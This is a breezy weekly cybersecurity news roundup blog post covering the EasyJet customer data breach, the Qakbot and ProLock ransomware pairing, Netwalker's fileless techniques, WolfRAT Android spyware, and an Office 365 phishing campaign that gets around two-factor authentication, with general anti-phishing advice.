What’s happened in the last seven days of cyber security slip-ups, viral vindictiveness and data disasters? Threat Thursday has the answers
This week; a data breach brings EasyJet down to Earth, while a malware campaign brings two threat groups together in harmony.
QueasyJet: Colossal Data Breach is No Plane Sailing for Discount Airline
Everyone’s favourite tangerine provider of discount holiday packages has suffered a bumpy landing. EasyJet confirmed earlier that this week that 9million – yes, that many – customers were affected by a companywide data breach, with 2,208 of those victims also having their personal payment details .
EasyJet became aware of the attack in January, but is only now coming forward with the details after confirming the scale of the breach. In a statement to the BBC, Easyjet said: “It took time to understand the scope of the attack and to identify who had been impacted… We could only inform people once the investigation had progressed enough that we were able to identify whether any individuals have been affected, then who had been impacted and what information had been accessed.”
According to an EasyJet spokesperson, the attacks were carried out by a “highly sophisticated attacker”, warning that anybody who has ever purchased an EasyJet flight will now need to be extra vigilant against the threat of phishing attempts. That’s…. not exactly a narrow demographic.
While it has been suggested that the attack was likely targeting EasyJet’s internal systems and not necessarily its customers, they’ve now nonetheless became a high-profile casualty of this attack. A spokesperson for the Information Commissioner’s Office concurs, advising ”… to be cautious of any communications purporting to come from EasyJet or EasyJet Holidays”.
This is no small breach, not least now, with any previous EasyJet customer now a potential victim. There’s also the worrying precedent set by the last airline to suffer a colossal data breach, British Airways. An ICO investigation in 2019 found their cyber security provisions lacking, and a historic £183.39 million GDPR fine was among one of the UK’s first and largest. If EasyJet’s attacker was as sophisticated as they claim, the company may not be at fault; but historically, it seems not even billion-pound airlines have their cyber security perfected.
If it Locks like a Bot, and Qaks like a Bot….
The Qakbot banking trojan, infamous for its sophistication and advanced detection-avoiding abilities, has teamed up with the burgeoning new ransomware ProLock to become a force of misery.
ProLock rose to prominence in the cyber crime world in April, following its successful breach of retail tech company Diebold Nixdorf. While ProLock targets poorly protected Remote Desktop Protocols to initiate the deployment of its ransomware, the Qakbot trojan leverages Emotet and phishing campaigns (like every other malware in existence, apparently) as part of its credential stealing M.O.
Combined, of course, the two have some pretty nasty capabilities. Sneaking onto unsecure networks, pilfering data unnoticed, and extorting the victim for a cash settlement long after making off with the goods is just one likely tactic.
A security alert by the FBI and an analysis by Group IB first reported this troubling development earlier in the week, detailing further attacks on healthcare facilities, government departments, the retail sector and further fintech industries. Furthermore, they report that it’s highly unlikely that any ransom payments will ensure the safety of their data; ProLock’s decryptor routinely fails to decrypt their compromised data.
Those in the affected industries are advised to familiarise themselves with the signs of phishing emails – and dump said emails straight into the virtual trash. As always, treat any unexpected emails with suspicion, and take an extra-cautious look at the sender’s details; is that domain address really as legit as it seems?
Of course, this isn’t the first time two successful malware strains have leapt into bed with one another. Maze and Ryuk were getting all chummy-chummy earlier this year, and these coordinated, tag-team attacks are likely to become more common in the world of cyber crime going forward. The real question, however, is which duo will be the first to have a falling-out, and initiate brutal viral warfare against one another? I’ll grab the popcorn.
Netwalker now Fileless as Well as Paperless
The Netwalker ransomware is adopting a growing and frustrating approach to digital infiltration by utilising ‘fileless threats’.
Unlike typical infections, fileless threats avoid the hard drive altogether, going straight for the memory and relying on no existing files to distribute – all of which make the attempts much harder to trace. Typically, they’ll run code within trusted applications such as Powershell, WMI or Flash, utilising flaws in their coding to allow malicious code to creep in. Thankfully, they do still rely on the typical social conditioning tactics in order to infiltrate systems; so while these infections are harder to trace, they’re no more difficult to avoid than the usual phishing attempts.
In a blog post this Monday, Trend Micro warned that the aforementioned ColdLock and now, Netwalker are leveraging these techniques. As Trend Micro explains, Netwalker is less than a year old and had begun recruiting cyber criminals as recently as March this year to help develop its as a Service model. It’s likely that Netwalker strain will kick off a series of threat campaigns in the near future – and a number of repeat headlines in upcoming Threat Thursdays.
Now’s a good time to remind you all that it isn’t just suspicious files that can help the spread of malware; sometimes, all it takes is clicking on the wrong link. With Netwalker seemingly upping its game, now’s the time to up our own if we’re to keep ourselves protected.
…And Out Come the Wolves
A new malware, named WolfRAT by the cyber security boffins at Talos, is currently in development. Targeting Android versions of popular messaging apps such as WhatsApp and Facebook Messenger, the malware currently appears to be targeting Thai victims. The likely developer is thought to be threat actors from Germany-based Wolf Research, who had previously sold surveillance technologies to European governments in 2018.
While Wolf Research has been disbanded for quite some some time, the cyber security boffins at Talos note some striking similarities between the way WolfRAT is compiled compared to the now-defunct developer’s previous works. They surmise that while Wolf Research is no more, then, its legacy lives on with some of its previous members. Within their research, Talos also notes some convincing links to Cyprus-based interception technology specialists Coralco Tech.
The malware, which is thought to be a remote credential-gathering tool for hackers, is believed to spread via phishing campaigns and disguise itself as legitimate-looking apps such as Google Play. Once installed, it can begin snaffling up the details of any and all messaging apps. Line, a popular messaging app in Thailand, is the most commonly-targeted, but there’s potential for WhatsApp, Facebook and SMS hijacking too. While this one’s currently targeting overseas entities, it’s still worth keeping an eye on this capable consortium lest they take their efforts worldwide.
Man the Lifeboats! Not even 2FA can Prevent this Latest Office 365 Phishing Campaign
Cofense’s Phishing Defence Sector has uncovered a new phishing campaign which not only accesses user data, but does so without needing to bypass Two Factor Authentication.
The phishing email, which lures in its victims with the ever-tantalising promise of a bonus package for Q1. As with last week’s Microsoft Teams phishing email, it accurately mimics the look of a SharePoint-hosted file – in this case a pdf. Clicking this takes the user to the Microsoft Online login page.
Here’s where it all gets a little technical. While the Microsoft login page is entirely legitimate, but there’s a certain instance of what we in the business call “jiggery-pokery” which allows the threat actors to bypass certain procedures using a Bulgarian url. As is usually the case, the researchers describe it far better than I can in their technical write-up, here.
From here, the hapless victim receives no Q1 bonus, but does potentially have all their login credentials stolen and potentially held to ransom if the criminals are feeling especially cheeky. As such, if you receive an email to the above effect it’s safe to suspect you’re not getting the bonus you’ve been promised. Well, okay - you might be, but check with your manager first rather than trusting an anonymous email. Who knows? Your workplace vigilance might even land you that raise you’ve always wanted. It’s win-win.
Thus concludes another Threat Thursday – but dry those eyes, for we’ll return next week with more of the latest rumbles and grumbles from the world of cyber security.
Rather we came to you?
Rather we came to you? You could always sign up for our weekly Threat Thursday emails; the latest Threat Thursday slap-bang in your inbox. Simply drop your contact details in the box on the right ➡️ and we’ll add you to our mailing list.